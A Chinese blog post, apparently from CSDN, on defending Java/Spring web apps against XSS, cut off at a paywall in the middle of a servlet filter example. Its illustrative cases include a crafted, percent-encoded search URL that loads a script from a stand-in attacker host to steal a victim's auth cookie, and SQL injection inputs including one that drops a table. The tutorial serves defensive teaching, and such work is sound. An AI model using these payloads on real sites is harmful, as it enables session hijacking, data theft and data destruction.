如何有效预防XSS?这几招管用

最新推荐文章于 2023-07-13 14:17:55 发布
VIP文章 最新推荐文章于 2023-07-13 14:17:55 发布
阅读量7.4k 收藏 3
点赞数 2
分类专栏: Java XSS Filter
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yusimiao/article/details/94352459
版权

原文链接

预防XSS,这几招管用

最近重温了一下「黑客帝国」系列电影,一攻一防实属精彩,生活中我们可能很少有机会触及那么深入的网络安全问题,但工作中请别忽略你身边的精彩

fire-and-water-2354583_1920.jpg

大家应该都听过 XSS (Cross-site scripting) 攻击问题,或多或少会有一些了解,但貌似很少有人将这个问题放在心上。一部分人是存有侥幸心理:“谁会无聊攻击我们的网站呢?”;另一部分人可能是工作职责所在,很少触碰这个话题。希望大家看过这篇文章之后能将问题重视起来,并有自己的解决方案, 目前XSS攻击问题依旧很严峻:

Cross-site scripting(XSS)是Web应用程序中常见的一种计算机安全漏洞,XSS 使攻击者能够将客户端脚本注入其他用户查看的网页中。 攻击者可能会使用跨站点脚本漏洞绕过访问控制,例如同源策略。 截至2007年,Symantec(赛门铁克) 在网站上执行的跨站脚本占据了所有安全漏洞的 84% 左右。2017年,XSS 仍被视为主要威胁载体,XSS 影响的范围从轻微的麻烦到重大的安全风险,影响范围的大小,取决于易受攻击的站点处理数据的敏感性方式以及站点所有者实施对数据处理的安全策略。

XSS 类型的划分以及其他概念性的东西在此就不做过多说明,Wikipedia Cross-site scripting 说明的非常清晰,本文主要通过举例让读者看到 XSS 攻击的严重性,同时提供相应的解决方案

XSS 案例

不喜欢看 XSS 案例的,请跳过此处,直接去看 解决方案 。Bob 和 Alice 两个人是经常用作案例(三次握手,SSH认证等)说明的,没错下面的这些案例也会让他们再上头条?

案例一

Alice 经常访问由 Bob 托管的特定网站, Bob 的网站允许 Alice 使用用户名/密码登陆后,存储敏感数据,例如账单信息。当用户登录时,浏览器会保留一个授权 Cookie,它看起来像一些垃圾字符,这样两台计算机(客户端和服务器)都有一条她已登录的记录。

Mallory 观察到 Bob 的网站包含一个 XSS 漏洞:

  1. 当她访问“搜索”页面时,她会在搜索框中输入搜索词,然后单击“提交”按钮。
  2. 使用普通的搜索查询,如单词“puppies”,页面只显示“找不到小狗相关内容”,网址为 http://bobssite.org/search?q=puppies 这是完全正常的行为。
  3. 但是,当她提交异常搜索查询时,例如 <script type ='application / javascript'> alert('xss'); </ script>
    • 出现一个警告框(表示“xss”)。
    • 该页面显示“未找到”,以及带有文本“xss”的错误消息。
    • URL 是http://bobssite.org/search?q= <script%20type ='application / javascript'> alert('xss'); </ script> , 这是一个可利用的行为

Mallory制作了一个利用此漏洞的URL:

  1. 她创建了URL http://bobssite.org/search?q=puppies<script%20src="http://mallorysevilsite.com/authstealer.js“> </ script>。她选择使用百分比编码 encode ASCII字符,例如 http://bobssite.org/search?q=puppies%3Cscript%2520src%3D%22http%3A%2F%2Fmallorysevilsite.com%2Fauthstealer.js%22 %3E%3C%2Fscript%3E,这样读者就无法立即破译这个恶意 URL
  2. 她给 Bob 网站的一些毫无防备的成员发了一封电子邮件,说“看看这些可爱的小狗!”

Alice 到电子邮件, 她喜欢小狗并点击链接。它进入Bob的网站进行搜索,找不到任何内容,并显示“找不到小狗”, 但就在这时,脚本标签运行(Alice 在屏幕上看不到)并加载并运行 Mallory 的程序 authstealer.js(触发了 XSS攻击)

authstealer.js 程序在 Alice 的浏览器中运行,就像正常访问 Bob 的网站一样。但该程序抓取 Alice 的授权 Cookie 副本并将其发送到 Mallory 的服务器

Mallory 现在将 Alice 的授权 Cookie 放入她的浏览器中,然后她去了 Bob 的网站,并以 Alice 身份登录。

Mallory 假借 Alice 身份进入网站的账单部分,查找 Alice 的信用卡号码并抓取副本。然后她去改变她的密码,这样过后爱丽丝甚至不能再登录了。

Mallory 决定更进一步向 Bob 本人发送一个类似的链接,从而获得Bob的网站管理员权限。

案例二

当向用户询问输入时,通常会发生 SQL 注入,例如用户名/用户ID,用户会为您提供一条 SQL 语句,您将无意中在数据库上运行该语句。
请查看以下示例,该示例通过向选择字符串添加变量(txtUserId)来创建SELECT语句。 该变量是从用户输入(getRequestString)获取的:

txtUserId = getRequestString("UserId");
txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId;

当用户输入 userId = 105 OR 1=1,这时 SQL 会是这个样子:

SELECT * FROM Users WHERE UserId = 105 OR 1=1;

OR 条件始终为 true,这样就有可能获取全部用户信息
如果用户输入 userId = 105; DROP TABLE Suppliers ,这时 SQL 语句会是这样子

SELECT * FROM Users WHERE UserId = 105; DROP TABLE Suppliers;

这样 Suppliers 表就被不知情的情况下删除掉了

通过上面的例子可以看出,XSS 相关问题可大可小,大到泄露用户数据,使系统崩溃;小到页面发生各种意想不到的异常。“苍蝇不叮无缝的蛋”,我们需要拿出解决方案,修复这个裂缝。但解决 XSS 问题需要多种方案的配合使用:

  1. 前端做表单数据合法性校验(这是第一层防护,虽然“防君子不防小人”,但必须要有)
  2. 后端做数据过滤与替换 (总有一些人会通过工具录入一些非法数据造访你的服务器的)
  3. 持久层数据编码规范,比如使用 Mybatis,看 Mybatis 中 “$" 和 “#” 千万不要乱用 了解这些小细节
    本文主要提供第 2 种方式的解决方案

解决方案

先不要向下看,思考一下,在整个 HTTP RESTful 请求过程中,如果采用后端服务做请求数据的过滤与替换,你能想到哪些解决方案?

文末关注公众号,带你像读侦探小说一样趣味学习 Java 技术

Spring AOP

使用 Spring AOP 横切所有 API 入口,貌似可以很轻松的实现,But(英文听力重点?),RESTful API 设计并不是统一的入参格式,有 GET 请求的 RequestParam 的入参,也有 POST 请求RequestBody的入参,不同的入参很难进行统一处理,所以这并不是很好的方式,关于 RESTful 接口的设计,可以参考 如何设计好的 RESTful API?

HttpMessageConverter

请求的 JSON 数据都要过 HttpMessageConverter 进行转换,通常我们可以通过添加 MappingJackson2HttpMessageConverter 并重写 readInternal 方法:

@Override
protected Object readInternal(Class<?> clazz, HttpInputMessage inputMessage) throws IOException, HttpMessageNotReadableException {
   
    return super.readInternal(clazz, inputMessage);
}

获取到转换过后的 Java 对象后对当前对象做处理,但这种方式没有办法处理 GET 请求,所以也不是一个很好的方案,想详细了解 HttpMessageConverter 数据转换过程可以查看 HttpMessageConverter是如何转换数据的?

Filter

Servlet Filter 不过多介绍,通过 Filter 可以过滤 HTTP Request,我们可以拿到请求的所有信息,所以我们可以在这里大做文章
我们有两种方式自定义我们的 Filter

  1. 实现 javax.servlet.Filter 接口
  2. Spring 环境下继承 org.springframework.web.filter.OncePerRequestFilter 抽象类
    这里采用第二种方式:
@Slf4j
public class GlobalSecurityFilter extends OncePerRequestFilter {
   
	@Override
	protected void doFilterInternal(HttpServletRequest request, HttpServletResponse response, FilterChain filterChain) throws ServletException, IOException {
   
		String userInput = request.getParameter("param");
		if (userInput != null && !userInput.equalsIgnoreCase(HtmlUtils.htmlEscape(userInput))) {
   
			throw new RuntimeException();
		}
		String requestBody = IOUtils.toString(request.getInputStream(), "UTF-8");
		if (requestBody != null && !requestBody.equalsIgnoreCase(HtmlUtils.htmlEscape(requestBody)
最低0.47元/天 解锁文章
yusimiao
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bluemonday:bluemonday:一种快速的golang HTML清理程序(受OWASP Java HTML Sanitizer的启发)来清理用户生成的XSS内容
02-04
忧愁星期一 bluemonday是在Go中实现HTML清理程序。 它是快速且高度可配置的。 bluemonday将不受信任的用户生成的内容作为输入,并将返回已针对批准HTML元素和属性的白名单进行过清理HTML,以便您可以安全地将其包含在网页中。 如果您接受用户生成的内容,并且服务器使用Go,则需要bluemonday。 用户生成的内容的默认策略( bluemonday.UGCPolicy().Sanitize() )变为: Hello < STYLE > . XSS { background-image : url ( "[removed]alert('XSS')" );} <
前端安全系列(一):如何防止XSS攻击?
最新发布
dzqxwzoe的博客
01-02 879
在开始本文之前,我们先提出一个问题,请判断以下两个说法是否正确:1.XSS 防范是后端 RD(研发人员)的责任,后端 RD 应该在所有用户提交数据的接口,对敏感字符进行转义,才能进行下一步操作。2.所有要插入到页面上的数据,都要通过一个敏感字符过滤函数的转义,过滤掉通用的敏感字符后,就可以插入到页面中。如果你还不能确定答案,那么可以带着这些问题向下看,我们将逐步拆解问题。在 HTML 中内嵌的文本中,恶意内容以 script 标签形成注入。
防范 XSS 攻击的措施
程序猿徐师兄的博客
07-13 2074
XSS 攻击是一种跨站点脚本攻击,攻击者通过在 Web 页面中注入 JavaScript 代码,从而利用用户浏览器的漏洞执行恶意操作。攻击者可以通过各种方式注入恶意脚本,包括通过表单、URL 参数、cookie 和 HTTP 头等。攻击者可以通过 XSS 攻击窃取用户的敏感信息,如用户名、密码、银行账户等,或者执行恶意操作,如重定向用户到一个恶意网站、发送恶意邮件等。XSS 攻击是一种常见的网络安全漏洞,攻击者通过注入恶意脚本来攻击用户的计算机和浏览器。
XSS攻击及防范
橘猫吃不胖的博客
02-06 1063
XSS攻击及防范 1 什么是XSS 2 XSS类型 2.1 反射型XSS 2.2 存储型XSS 2.3 DOM型XSS 3 怎么预防XSS 3.1 纯前端渲染 3.2 转义HTML 3.3 关注高危API 3.4 其他措施
XSS如何防范
qq_45803050的博客
11-27 8018
XSS如何防范 题意分析 在 Web 安全领域中,XSS 和 CSRF 是最常见的攻击方式。下面我们首先简单了解一下什么是 XSS 和 CSRF 。 XSS,即 Cross Site Script,中译是跨站脚本攻击;其原本缩写是 CSS,但为了和层叠样式表(Cascading Style Sheet)有所区分,因而在安全领域叫做 XSSXSS 攻击是指攻击者在网站上注入恶意的客户端代码,通过恶意脚本对客户端网页进行篡改,从而在用户浏览网页时,对用户浏览器进行控制或者获取用户隐私数据的一种攻击方式。攻击者
如何防止XSS攻击
m0_49521873的博客
05-23 5573
3. 设置HTTP头部:设置HTTP头部,包括Content-Security-Policy、X-Content-Type-Options、X-XSS-Protection等,来使浏览器拦截来自第三方资源的恶意脚本。4. 使用脚本过滤器:使用脚本过滤器,如Google的Closure Library和jQuery库等,能够对来自用户的数据进行过滤和检查。2. 转义特殊字符:在网页中用户输入的内容需要使用转义字符,例如将 < 转义成 <,将 > 转义成 >,避免浏览器将这些字符误解为标签等。
XSS攻击的预防措施
qq_45335911的博客
09-07 6319
XSS攻击的预防 结合上一篇文章知道了XSS的基本攻击方式和基本概念,这里就主要讲一下如何预防XSS的攻击。 上面是我在网上找的一个可以作为简单理解的概念图,如果不理解可以根据顺序参照理解。 预防储存型和反射型XSS攻击 存储型和反射型 XSS 都是在服务端取出恶意代码后,插入到响应 HTML 里的,攻击者刻意编写的“数据”被内嵌到“代码”中,被浏览器所执行。 预防这两种漏洞,有两种常见做法: 改成纯前端渲染,把代码和数据分隔开。 对 HTML 做充分转义。 纯前端渲染 纯前端渲染的过程: 浏览器先加载一
预防XSS攻击和SQL注入XssFilter
05-19
一、什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如...
前端安全系列:如何防止XSS攻击?
02-25
在移动互联网时代,前端人员除了传统的XSS、CSRF等安全问题之外,又时常遭遇网络劫持、非法调用HybridAPI等新型安全问题。当然,浏览器自身也在不断在进化和发展,不断引入CSP、Same-SiteCookies等新技术来增强安全...
java 预防XSS攻击
08-23
Java开发项目,预防XSS攻击后台编写
前端安全之XSS的原理和防范
我可是小老虎的博客
10-11 833
前端安全 XSS 攻击的介绍 XSS 攻击的分类 XSS 攻击的预防和检测 XSS 攻击的总结 XSS 攻击案例 XSS 攻击的介绍 XSS 漏洞的发生和修复 XSS 攻击是页面被注入了恶意的代码,为了更形象的介绍,我们用发生在小明同学身边的事例来进行说明。 一个案例 某天,公司需要一个搜索页面,根据 URL 参数决定关键词的内容。小明很快把页面写好并且上线。代码如下: <input type="text" value="<%= getParameter("keyword") %&gt.
如何防止XSS攻击?
半夏_2021的博客
05-05 6271
如何防止XSS攻击?
XSS攻击与防范方法
m0_58474008的博客
05-16 1175
当恶意攻击者向web应用程序的页面里插入恶意脚本,处于客户端的用户浏览该网页时,嵌入在正常web页面中的恶意代码就会被执行,从而达到攻击者攻击访问用户、获取访问用户信息,甚至获取网站权限的特殊目的。DOM型XSS攻击执行的前提是原始网页存在一些修改DOM对象的方法和属性,这些方法及属性能动态地刷新响应页面,并向其中添加一些新的内容,而不需要用户在浏览器里执行任何的操作。如果攻击者利用这一特性,在具有XSS漏洞的 web应用程序中植入恶意脚本,那么被攻击的用户就间接地访问了该恶意脚本。
手把手教你防御 XSS 攻击
Maisu的博客
12-15 606
由于需要用户主动打开恶意的 URL 才能生效,攻击者往往会结合多种手段诱导用户点击。
java防止XSS(跨站脚本攻击)攻击的常用方法总结
热门推荐
码在飞博客
07-13 1万+
一、什么是XSS攻击? XSS攻击:跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆, 故将跨站脚本攻击缩写为XSS。 二、如何预防XSS攻击呢? 自己写 filter 拦截来实现,但要注意的时,在WEB.XM 中配置 filter的时候,请将这个 filter 放在第一位. 采用开
【web安全】XSS攻击(跨站脚本攻击)如何防范与实现
AA2534193348的博客
05-31 4479
XSS攻击(跨站脚本攻击)是一种常见的Web安全漏洞,攻击者在Web页面中插入恶意脚本代码,并在受害人访问该页面时执行脚本代码,从而获取用户敏感信息、操作受害人账号或篡改页面内容等不当行为。XSS攻击可以通过输入表单、搜索框、评论区等途径实现,因此对于Web开发人员来说,要采取相应的措施预防和修复XSS漏洞,以确保用户数据的安全。
web安全之XSS攻击原理及防范
lgxzzz的博客
05-27 7899
一:什么是XSS攻击? 二:反射型XSS 三:存储型XSS 四:DOM-based型XSS 五:SQL注入 六:XSS如何防范? 1. cookie安全策略 2. X-XSS-Protection设置 3. XSS防御HTML编码 4. XSS 防御HTML Attribute编码 5. XSS防御之javascript编码 6. XSS 防御之 URL 编码 7. XSS 防御之 CSS 编码 8. 开启CSP网页安全政策防止XSS攻击 回到顶部 一:什么是X
web安全之XSS攻击及防范
qq_40057138的博客
03-14 1441
一:什么是XSS攻击? 二:反射型XSS 三:存储型XSS 四:DOM-based型XSS 五:SQL注入 六:XSS如何防范? cookie安全策略 X-XSS-Protection设置 XSS防御HTML编码 XSS 防御HTML Attribute编码 XSS防御之javascript编码 XSS 防御之 URL 编码 XSS 防御之 CSS 编码 开启CSP网页安全政策防止XSS攻击 一:什么是XSS攻击? XSS 即(Cross Site Scripting)中文名称为:跨站脚本攻击。XSS
有效预防xss_预防XSS攻击的一些方法整理
weixin_29069575的博客
01-17 3013
XSS又称CSS,全称Cross SiteScript(跨站脚本攻击), XSS攻击类似于SQL注入攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。如,盗取用户Cookie信息、破坏页面结构、重定向到其它网站等。常见...
什么是 XSS 攻击?如何预防
05-16
为了预防XSS攻击,可以采取以下几种措施: 1. 对用户输入进行过滤和验证:在Web应用程序中,对所有输入的数据进行过滤和验证,防止恶意脚本被注入。可以使用一些开源的XSS过滤器,如ESAPI和HTML Purifier。 2. 对...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值